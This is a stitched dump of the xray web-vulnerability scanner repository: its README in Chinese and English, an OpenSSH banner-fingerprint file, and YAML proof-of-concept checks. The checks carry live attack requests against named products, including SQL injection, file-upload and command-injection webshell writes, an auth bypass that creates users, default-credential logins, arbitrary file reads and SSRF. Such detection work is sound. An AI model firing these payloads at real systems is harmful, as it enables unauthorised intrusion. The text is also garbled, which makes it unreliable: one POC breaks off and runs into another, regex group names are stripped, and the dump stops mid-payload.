| XStream漏洞检测 | `xstream` | 社区版 | 检测XStream系列漏洞 |
| Struts2 系列漏洞检测 | `struts` | 高级版 | 检测目标网站是否存在Struts2系列漏洞,包括s2-016、s2-032、s2-045、s2-059、s2-061等常见漏洞 |
| Thinkphp系列漏洞检测 | `thinkphp` | 高级版 | 检测ThinkPHP开发的网站的相关漏洞 |
| shiro反序列化漏洞检测 | `shiro` | 高级版 | 检测Shiro反序列化漏洞 |
| fastjson系列检测 | `fastjson` | 高级版 | 检测fastjson系列漏洞 |
## ⚡️ 进阶使用
下列高级用法请查看 https://docs.xray.cool/ 使用。
- 修改配置文件
- 抓取 https 流量
- 修改 http 发包配置
- 反连平台的使用
- ...
## 😘 贡献 POC
xray的进步离不开各位师傅的支持,秉持着互助共建的精神,为了让我们共同进步,xray也开通了“PoC收录”的渠道!在这里你将会得到:
### 提交流程
1. 贡献者以 PR 的方式向 github xray 社区仓库内提交, POC 提交位置: https://github.com/chaitin/xray/tree/master/pocs, 指纹识别脚本提交位置: https://github.com/chaitin/xray/tree/master/fingerprints
2. PR 中根据 Pull Request 的模板填写 POC 信息
3. 内部审核 PR,确定是否合并入仓库
4. 但需要注意,如果想要获得POC的奖励,需要将你的POC提交到CT stack,才能获取到奖励
### 丰厚的奖励
- 贡献PoC将获得**丰厚的金币奖励**,成就感满满;
- **丰富的礼品**兑换专区,50余种周边礼品任你挑选;
- 定期更有京东卡上线兑换,离**财富自由**又近了一步;
- 进入核心社群的机会,领取特殊任务,赚取**高额赏金**;
### 完善的教程
- 完善的**PoC编写教程和指导**,让你快速上手,少走弯路;
### 学习与交流
- **与贡献者、开发者面对面**学习交流的机会,各项能力综合提高;
- 免笔试的**直通面试机会**,好工作不是梦;
如果你已经成功贡献过PoC但是还没有进群,请添加客服微信:
Welcome to xray 👋
A Powerful Security Assessment Tool
🏠 Documentation •
⬇️ Download xray •
⬇️ Download xpoc •
⬇️ Download xapp •
📖 Plugin Repository
[**中文版**](./README.md)
> Note: xray is not open source, just download the built binary files directly. The repository mainly contains community-contributed POCs. Each xray release will automatically package them.
## ✨ xray 2.0
To address the issue of xray 1.0 becoming complex and bloated with added features, we have launched xray 2.0.
This new version aims to enhance the smoothness of functionality, lower the usage threshold, and help more security industry practitioners achieve a better experience more efficiently. xray 2.0 will integrate a series of new security tools to form a comprehensive security toolset.
**The second tool in the xray 2.0 series, xapp, is now online, welcome to try it!**
### XPOC
xpoc is the first tool in the xray 2.0 series, designed as a rapid emergency response tool for supply chain vulnerability scanning.
Project address: https://github.com/chaitin/xpoc
### XAPP
xapp is a tool focused on web fingerprint identification. You can use xapp to identify the technologies used by web targets and prepare for security testing.
Project address: https://github.com/chaitin/xapp
### Plugin Repository
We have created a dedicated repository for various plugins, aimed at facilitating the sharing and use of different plugins.
It mainly collects open-source scripts converted into xray format for everyone to use.
We will periodically push some new plugins here and hope everyone will actively optimize or submit plugins to enrich this repository together.
Project address: https://github.com/chaitin/xray-plugins
## 🚀 Quick Usage
**Before using, be sure to read and agree to the terms in the [License](https://github.com/chaitin/xray/blob/master/LICENSE.md) file. If not, please do not install or use this tool.**
1. Use the basic crawler to scan the links crawled by the crawler for vulnerabilities
```bash
xray webscan --basic-crawler http://example.com --html-output vuln.html
```
2. Use HTTP proxy for passive scanning
```bash
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html
```
Set the browser's HTTP proxy to `http://127.0.0.1:7777`, then you can automatically analyze proxy traffic and scan it.
> To scan HTTPS traffic, please read the "Capture HTTPS Traffic" section below.
3. Scan a single URL without using a crawler
```bash
xray webscan --url http://example.com/?a=b --html-output single-url.html
```
4. Manually specify plugins for this run
By default, all built-in plugins will be enabled. You can specify the plugins to be enabled for this scan with the following commands.
```bash
xray webscan --plugins cmd-injection,sqldet --url http://example.com
xray webscan --plugins cmd-injection,sqldet --listen 127.0.0.1:7777
```
5. Specify Plugin Output
You can specify to output the vulnerability information of this scan to a file:
```bash
xray webscan --url http://example.com/?a=b \
--text-output result.txt --json-output result.json --html-output report.html
```
[Sample Report](https://docs.xray.cool/assets/report_example.html)
For other usage, please read the documentation: https://docs.xray.cool
## 🪟 Detection Modules
New detection modules will be continuously added.
| Name | Key | Version | Description |
|------------------|------------------|----------|--------------------------------------------------------------------------------------|
| XSS Detection | `xss` | Community | Detects XSS vulnerabilities using semantic analysis |
| SQL Injection Detection | `sqldet` | Community | Supports error-based injection, boolean-based injection, and time-based blind injection |
| Command/Code Injection Detection | `cmd-injection` | Community | Supports shell command injection, PHP code execution, template injection, etc. |
| Directory Enumeration | `dirscan` | Community | Detects over 10 types of sensitive paths and files such as backup files, temporary files, debug pages, and configuration files |
| Path Traversal Detection | `path-traversal` | Community | Supports common platforms and encodings |
| XML External Entity (XXE) Detection | `xxe` | Community | Supports detection with echo and back-connect platform |
| POC Management | `phantasm` | Community | Comes with some common POCs by default; users can build and run POCs as needed. Documentation: [POC](https://docs.xray.cool/#/guide/poc) |
| File Upload Detection | `upload` | Community | Supports common backend languages |
| Weak Password Detection | `brute-force` | Community | Community edition supports HTTP basic authentication and simple form weak password detection, with built-in common username and password dictionary |
| JSONP Detection | `jsonp` | Community | Detects JSONP interfaces containing sensitive information that can be read across domains |
| SSRF Detection | `ssrf` | Community | SSRF detection module, supports common bypass techniques and back-connect platform detection |
| Baseline Check | `baseline` | Community | Detects low SSL versions, missing or incorrectly added HTTP headers |
| Arbitrary Redirect Detection | `redirect` | Community | Supports HTML meta redirects, 30x redirects, etc. |
| CRLF Injection | `crlf-injection` | Community | Detects HTTP header injection, supports parameters in query, body, etc. |
| XStream Vulnerability Detection | `xstream` | Community | Detects XStream series vulnerabilities |
| Struts2 Vulnerability Detection | `struts` | Advanced | Detects Struts2 series vulnerabilities, including common ones like s2-016, s2-032, s2-045, s2-059, s2-061, etc. |
| ThinkPHP Vulnerability Detection | `thinkphp` | Advanced | Detects related vulnerabilities in websites developed with ThinkPHP |
| Shiro Deserialization Vulnerability Detection | `shiro` | Advanced | Detects Shiro deserialization vulnerabilities |
| Fastjson Vulnerability Detection | `fastjson` | Advanced | Detects Fastjson series vulnerabilities |
## ⚡️ Advanced Usage
For the following advanced usage, please see https://docs.xray.cool/.
- Modify configuration file
- Capture HTTPS traffic
- Modify HTTP request configuration
- Use of the back-connect platform
- ...
## 😘 Contribute POCs
The progress of xray cannot be achieved without the support of many contributors. In the spirit of mutual assistance and co-construction, to help us all progress together, xray has also opened a channel for "POC inclusion"! Here you will get:
### Submission Process
1. Contributors submit to the GitHub xray community repository via PR. POC submission location: https://github.com/chaitin/xray/tree/master/pocs, fingerprint script submission location: https://github.com/chaitin/xray/tree/master/fingerprints
2. Fill in the POC information according to the Pull Request template in the PR.
3. Internal review of the PR to determine whether to merge into the repository.
4. Note: To receive POC rewards, you need to submit your POC to the CT stack to receive the rewards.
### Generous Rewards
- Contribute POCs to receive **generous gold rewards** with a sense of accomplishment;
- **Rich gift** redemption area, with over 50 kinds of peripheral gifts to choose from;
- Regularly launch JD card redemption, getting **closer to financial freedom**;
- Opportunity to enter the core community, receive special tasks, and earn **high bounties**;
### Comprehensive Tutorials
- Comprehensive **POC writing tutorials and guidance** to help you get started quickly and avoid pitfalls;
### Learning and Communication
- **Face-to-face learning and communication opportunities** with contributors and developers, improving comprehensive skills;
- **Direct interview opportunities** without written tests, making good jobs not just a dream;
If you have successfully contributed a POC but have not yet
joined the group, please add the customer service WeChat:
将重定向到 xray 新文档站点
xray 的文档已经迁移至 docs.xray.cool ,如果您的浏览器没有自动跳转,请点击上述链接。
================================================
FILE: fingerprints/tcp-openbsd-openssh.yml
================================================
name: fingerprint-yaml-tcp-openbsd-openssh
manual: false
transport: tcp
set:
re1: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) Debian-(?P\\S*maemo\\S*)\\r?\\n"'
re2: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)[ -]{1,2}Debian[ -_](?P.*ubuntu.*)\\r\\n"'
re3: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)[ -]{1,2}Ubuntu[ -_](?P[^\\r\\n]+)\\r?\\n"'
re4: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)[ -]{1,2}Debian[ -_](?P[^\\r\\n]+)\\r?\\n"'
re5: '"^SSH-([\\d.]+)-OpenSSH_[\\w.]+-FC-(?P[\\w.-]+)\\.fc(\\d+)\\r\\n"'
re6: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) FreeBSD-([\\d]+)\\r?\\n"'
re7: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) FreeBSD localisations (\\d+)\\r?\\n"'
re8: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) FreeBSD-openssh-portable-(?:base-|amd64-)?[\\w.,]+\\r?\\n"'
re9: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) FreeBSD-openssh-portable-overwrite-base"'
re10: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) FreeBSD-openssh-gssapi-"'
re11: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) FreeBSD\\n"'
re12: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) miniBSD-([\\d]+)\\r?\\n"'
re13: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) NetBSD_Secure_Shell-([\\w._+-]+)\\r?\\n"'
re14: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)_Mikrotik_v(?P[\\d.]+)\\r?\\n"'
re15: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) in RemotelyAnywhere ([\\d.]+)\\r?\\n"'
re16: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)\\+CAN-2004-0175\\r?\\n"'
re17: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) NCSA_GSSAPI_20040818 KRB5\\r?\\n"'
re18: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)[-_]hpn(\\w+) *(?:\\\"\\\")?\\r?\\n"'
re19: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+\\+sftpfilecontrol-v[\\d.]+-hpn\\w+)\\r?\\n"'
re20: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+-hpn) NCSA_GSSAPI_\\d+ KRB5\\r?\\n"'
re21: '"^SSH-([\\d.]+)-OpenSSH_3\\.4\\+p1\\+gssapi\\+OpenSSH_3\\.7\\.1buf_fix\\+2006100301\\r?\\n"'
re22: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+\\.RL)\\r?\\n"'
re23: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+-CERN\\d+)\\r?\\n"'
re24: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+\\.cern-hpn)"'
re25: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+-hpn)\\r?\\n"'
re26: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+-pwexp\\d+)\\r?\\n"'
re27: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)-chrootssh\\n"'
re28: '"^SSH-([\\d.]+)-Nortel\\r?\\n"'
re29: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w.]+)[-_]hpn(\\w+) DragonFly-"'
re30: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w.]+) DragonFly-"'
re31: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w_.-]+) FIPS\\n"'
re32: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w_.-]+) FIPS\\r\\n"'
re33: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w_.-]+) NCSA_GSSAPI_GPT_([-\\w_.]+) GSI\\n"'
re34: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) \\.\\n"'
re35: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) PKIX\\r\\n"'
re36: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)-FIPS\\(capable\\)\\r\\n"'
re37: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+)-sshjail\\n"'
re38: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) Raspbian-(?P[^\\r\\n]+)\\r?\\n"'
re39: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) OVH-rescue\\r\\n"'
re40: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) Trisquel_GNU/linux_([\\d.]+)(?:-\\d+)?\\r\\n"'
re41: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) \\+ILOM\\.2015-5600\\r\\n"'
re42: '"^SSH-([\\d.]+)-OpenSSH_(?P[\\w._-]+) SolidFire Element \\r\\n"'
re43: '"(?i)^SSH-([\\d.]+)-OpenSSH[_-](?P[\\w.]+)\\s*\\r?\\n"'
re44: '"^SSH-([\\d.]+)-OpenSSH\\r?\\n$"'
re45: '"^Access to service sshd from [-\\w_.]+@[-\\w_.]+ has been denied\\.\\r\\n"'
rules:
r1:
expression: re1.bmatches(response.raw)
output:
re1_result: re1.bsubmatch(response.raw)
osname: '"Linux"'
version: '"" + re1_result["version0"] + " Debian " + re1_result["version1"] + ""'
r2:
expression: re2.bmatches(response.raw)
output:
re2_result: re2.bsubmatch(response.raw)
osname: '"Linux"'
version: '"" + re2_result["version0"] + " Debian " + re2_result["version1"] + ""'
r3:
expression: re3.bmatches(response.raw)
output:
re3_result: re3.bsubmatch(response.raw)
osname: '"Linux"'
version: '"" + re3_result["version0"] + " Ubuntu " + re3_result["version1"] + ""'
r4:
expression: re4.bmatches(response.raw)
output:
re4_result: re4.bsubmatch(response.raw)
osname: '"Linux"'
version: '"" + re4_result["version0"] + " Debian " + re4_result["version1"] + ""'
r5:
expression: re5.bmatches(response.raw)
output:
re5_result: re5.bsubmatch(response.raw)
osname: '"Linux"'
version: '"" + re5_result["version"] + " Fedora"'
r6:
expression: re6.bmatches(response.raw)
output:
re6_result: re6.bsubmatch(response.raw)
osname: '"FreeBSD"'
version: re6_result["version"]
r7:
expression: re7.bmatches(response.raw)
output:
re7_result: re7.bsubmatch(response.raw)
osname: '"FreeBSD"'
version: re7_result["version"]
r8:
expression: re8.bmatches(response.raw)
output:
re8_result: re8.bsubmatch(response.raw)
osname: '"FreeBSD"'
version: re8_result["version"]
r9:
expression: re9.bmatches(response.raw)
output:
re9_result: re9.bsubmatch(response.raw)
osname: '"FreeBSD"'
version: re9_result["version"]
r10:
expression: re10.bmatches(response.raw)
output:
re10_result: re10.bsubmatch(response.raw)
osname: '"FreeBSD"'
version: re10_result["version"]
r11:
expression: re11.bmatches(response.raw)
output:
re11_result: re11.bsubmatch(response.raw)
osname: '"FreeBSD"'
version: re11_result["version"]
r12:
expression: re12.bmatches(response.raw)
output:
re12_result: re12.bsubmatch(response.raw)
osname: '"MiniBSD"'
version: re12_result["version"]
r13:
expression: re13.bmatches(response.raw)
output:
re13_result: re13.bsubmatch(response.raw)
osname: '"NetBSD"'
version: re13_result["version"]
r14:
expression: re14.bmatches(response.raw)
output:
re14_result: re14.bsubmatch(response.raw)
device: '"router"'
version: '"" + re14_result["version0"] + " mikrotik " + re14_result["version1"] + ""'
r15:
expression: re15.bmatches(response.raw)
output:
re15_result: re15.bsubmatch(response.raw)
osname: '"Windows"'
version: re15_result["version"]
r16:
expression: re16.bmatches(response.raw)
output:
re16_result: re16.bsubmatch(response.raw)
version: '"" + re16_result["version"] + " CAN-2004-0175"'
r17:
expression: re17.bmatches(response.raw)
output:
re17_result: re17.bsubmatch(response.raw)
version: '"" + re17_result["version"] + " NCSA_GSSAPI_20040818 KRB5"'
r18:
expression: re18.bmatches(response.raw)
output:
re18_result: re18.bsubmatch(response.raw)
version: re18_result["version"]
r19:
expression: re19.bmatches(response.raw)
output:
re19_result: re19.bsubmatch(response.raw)
version: re19_result["version"]
r20:
expression: re20.bmatches(response.raw)
output:
re20_result: re20.bsubmatch(response.raw)
version: re20_result["version"]
r21:
expression: re21.bmatches(response.raw)
output:
version: '"3.4p1 with CMU Andrew patches"'
r22:
expression: re22.bmatches(response.raw)
output:
re22_result: re22.bsubmatch(response.raw)
device: '"switch"'
version: '"" + re22_result["version"] + " Allied Telesis"'
r23:
expression: re23.bmatches(response.raw)
output:
re23_result: re23.bsubmatch(response.raw)
version: re23_result["version"]
r24:
expression: re24.bmatches(response.raw)
output:
re24_result: re24.bsubmatch(response.raw)
version: re24_result["version"]
r25:
expression: re25.bmatches(response.raw)
output:
re25_result: re25.bsubmatch(response.raw)
version: re25_result["version"]
r26:
expression: re26.bmatches(response.raw)
output:
re26_result: re26.bsubmatch(response.raw)
osname: '"AIX"'
version: re26_result["version"]
r27:
expression: re27.bmatches(response.raw)
output:
re27_result: re27.bsubmatch(response.raw)
version: re27_result["version"]
r28:
expression: re28.bmatches(response.raw)
output:
device: '"switch"'
r29:
expression: re29.bmatches(response.raw)
output:
re29_result: re29.bsubmatch(response.raw)
osname: '"DragonFlyBSD"'
version: re29_result["version"]
r30:
expression: re30.bmatches(response.raw)
output:
re30_result: re30.bsubmatch(response.raw)
osname: '"DragonFlyBSD"'
version: re30_result["version"]
r31:
expression: re31.bmatches(response.raw)
output:
re31_result: re31.bsubmatch(response.raw)
device: '"firewall"'
version: re31_result["version"]
r32:
expression: re32.bmatches(response.raw)
output:
re32_result: re32.bsubmatch(response.raw)
device: '"switch"'
version: re32_result["version"]
r33:
expression: re33.bmatches(response.raw)
output:
re33_result: re33.bsubmatch(response.raw)
version: re33_result["version"]
r34:
expression: re34.bmatches(response.raw)
output:
re34_result: re34.bsubmatch(response.raw)
version: re34_result["version"]
r35:
expression: re35.bmatches(response.raw)
output:
re35_result: re35.bsubmatch(response.raw)
version: re35_result["version"]
r36:
expression: re36.bmatches(response.raw)
output:
re36_result: re36.bsubmatch(response.raw)
version: re36_result["version"]
r37:
expression: re37.bmatches(response.raw)
output:
re37_result: re37.bsubmatch(response.raw)
version: re37_result["version"]
r38:
expression: re38.bmatches(response.raw)
output:
re38_result: re38.bsubmatch(response.raw)
osname: '"Linux"'
version: '"" + re38_result["version0"] + " Raspbian " + re38_result["version1"] + ""'
r39:
expression: re39.bmatches(response.raw)
output:
re39_result: re39.bsubmatch(response.raw)
version: re39_result["version"]
r40:
expression: re40.bmatches(response.raw)
output:
re40_result: re40.bsubmatch(response.raw)
osname: '"Linux"'
version: re40_result["version"]
r41:
expression: re41.bmatches(response.raw)
output:
re41_result: re41.bsubmatch(response.raw)
version: re41_result["version"]
r42:
expression: re42.bmatches(response.raw)
output:
re42_result: re42.bsubmatch(response.raw)
version: re42_result["version"]
r43:
expression: re43.bmatches(response.raw)
output:
re43_result: re43.bsubmatch(response.raw)
version: re43_result["version"]
r44:
expression: re44.bmatches(response.raw)
output:
device: '"terminal server"'
r45:
expression: re45.bmatches(response.raw)
expression: r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() || r10() || r11() || r12() || r13() || r14() || r15() || r16() || r17() || r18() || r19() || r20() || r21() || r22() || r23() || r24() || r25() || r26() || r27() || r28() || r29() || r30() || r31() || r32() || r33() || r34() || r35() || r36() || r37() || r38() || r39() || r40() || r41() || r42() || r43() || r44() || r45()
detail:
fingerprint:
infos:
- type: system_bin
name: openssh
version: '{{version}}'
- type: operating_system
name: '{{osname}}'
================================================
FILE: pocs/74cms-sqli-1.yml
================================================
name: poc-yaml-74cms-sqli-1
manual: true
transport: http
set:
rand: randomInt(200000000, 210000000)
rules:
r0:
request:
cache: true
method: POST
path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
headers:
Content-Type: text/xml
body: ]>&test; 1111 123 3 1%' union select md5({{rand}})# .*?),".bsubmatch(response.body)'
home: search["home"]
r2:
request:
cache: true
method: MOVE
path: /fileserver/{{filename}}.txt
headers:
Destination: file://{{home}}/webapps/api/{{filename}}.jsp
follow_redirects: false
expression: response.status == 204
r3:
request:
cache: true
method: GET
path: /api/{{filename}}.jsp
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
expression: r0() && r1() && r2() && r3()
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
================================================
FILE: pocs/activemq-default-password.yml
================================================
name: poc-yaml-activemq-default-password
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /admin/
expression: response.status == 401 && response.body.bcontains(b"Unauthorized")
r1:
request:
cache: true
method: GET
path: /admin/
headers:
Authorization: Basic YWRtaW46YWRtaW4=
expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"Broker ")
expression: r0() && r1()
detail:
author: pa55w0rd(www.pa55w0rd.online/)
links:
- https://blog.csdn.net/ge00111/article/details/72765210
================================================
FILE: pocs/airflow-unauth.yml
================================================
name: poc-yaml-airflow-unauth
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /admin/
expression: response.status == 200 && response.body.bcontains(b"Airflow - DAGs ") && response.body.bcontains(b"DAGs ")
expression: r0()
detail:
author: pa55w0rd(www.pa55w0rd.online/)
links:
- http://airflow.apache.org/
================================================
FILE: pocs/alibaba-canal-default-password.yml
================================================
name: poc-yaml-alibaba-canal-default-password
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /api/v1/user/login
expression: response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
r1:
request:
cache: true
method: POST
path: /api/v1/user/login
headers:
Content-Type: application/json
body: '{"username":"admin","password":"123456"}'
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
expression: r0() && r1()
detail:
author: jweny(https://github.com/jweny)
links:
- https://www.cnblogs.com/xiexiandong/p/12888582.html
================================================
FILE: pocs/alibaba-canal-info-leak.yml
================================================
name: poc-yaml-alibaba-canal-info-leak
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /api/v1/canal/config/1/1
follow_redirects: false
expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
expression: r0()
detail:
author: Aquilao(https://github.com/Aquilao)
links:
- https://my.oschina.net/u/4581879/blog/4753320
info: alibaba Canal info leak
================================================
FILE: pocs/alibaba-nacos-v1-auth-bypass.yml
================================================
name: poc-yaml-alibaba-nacos-v1-auth-bypass
manual: true
transport: http
set:
r1: randomLowercase(16)
r2: randomLowercase(16)
rules:
r0:
request:
cache: true
method: POST
# 增加了 bypass 的方式
path: /nacos/v1/auth/users/?username={{r1}}&password={{r2}}
headers:
User-Agent: Nacos-Server
expression: response.status == 200 && response.body.bcontains(bytes("create user ok!"))
r1:
request:
cache: true
method: GET
path: /nacos/v1/auth/users/?pageNo=1&pageSize=999
headers:
User-Agent: Nacos-Server
expression: response.status == 200 && response.body.bcontains(bytes(r1))
r2:
request:
cache: true
method: DELETE
path: /nacos/v1/auth/users/?username={{r1}}
headers:
User-Agent: Nacos-Server
# 不需要判断这个条件
expression: "true"
expression: r0() && r1() && r2()
detail:
author: kmahyyg(https://github.com/kmahyyg)
links:
- https://github.com/alibaba/nacos/issues/4593
- https://github.com/alibaba/nacos/issues/4701
vulnerability:
id: CT-153900
================================================
FILE: pocs/amtt-hiboss-server-ping-rce.yml
================================================
name: poc-yaml-amtt-hiboss-server-ping-rce
manual: true
transport: http
set:
r2: randomLowercase(10)
rules:
r0:
request:
cache: true
method: GET
path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"">../../{{r2}}.php&id=1
expression: response.status == 200 && response.body.bcontains(b"parent.doTestResult")
r1:
request:
cache: true
method: GET
path: /{{r2}}.php
expression: response.status == 200 && response.body.bcontains(bytes(md5(r2)))
expression: r0() && r1()
detail:
author: YekkoY
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
description: 安美数字-酒店宽带运营系统-远程命令执行漏洞
================================================
FILE: pocs/apache-ambari-default-password.yml
================================================
name: poc-yaml-apache-ambari-default-password
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
headers:
Authorization: Basic YWRtaW46YWRtaW4=
expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
expression: r0()
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
================================================
FILE: pocs/apache-druid-cve-2021-36749.yml
================================================
name: poc-yaml-apache-druid-cve-2021-36749
manual: true
transport: http
rules:
druid1:
request:
cache: true
method: POST
path: /druid/indexer/v1/sampler?for=connect
headers:
Content-Type: application/json;charset=utf-8
body: |
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
druid2:
request:
cache: true
method: POST
path: /druid/indexer/v1/sampler?for=connect
headers:
Content-Type: application/json;charset=utf-8
body: |
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
expression: druid1() || druid2()
detail:
author: iak3ec(https://github.com/nu0l)
links:
- https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
================================================
FILE: pocs/apache-flink-upload-rce.yml
================================================
name: poc-yaml-apache-flink-upload-rce
manual: true
transport: http
set:
r1: randomLowercase(8)
r2: randomLowercase(4)
rules:
r0:
request:
cache: true
method: GET
path: /jars
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files")
r1:
request:
cache: true
method: POST
path: /jars/upload
headers:
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
body: "\
--8ce4b16b22b58894aa86c421e8759df3\r\n\
Content-Disposition: form-data; name=\"jarfile\";filename=\"{{r2}}.jar\"\r\n\
Content-Type:application/octet-stream\r\n\
\r\n\
{{r1}}\r\n\
--8ce4b16b22b58894aa86c421e8759df3--\r\n\
"
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
output:
search: '"(?P([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))".bsubmatch(response.body)'
filen: search["filen"]
r2:
request:
cache: true
method: DELETE
path: /jars/{{filen}}
follow_redirects: true
expression: response.status == 200
expression: r0() && r1() && r2()
detail:
author: timwhite
links:
- https://github.com/LandGrey/flink-unauth-rce
================================================
FILE: pocs/apache-httpd-cve-2021-40438-ssrf.yml
================================================
name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA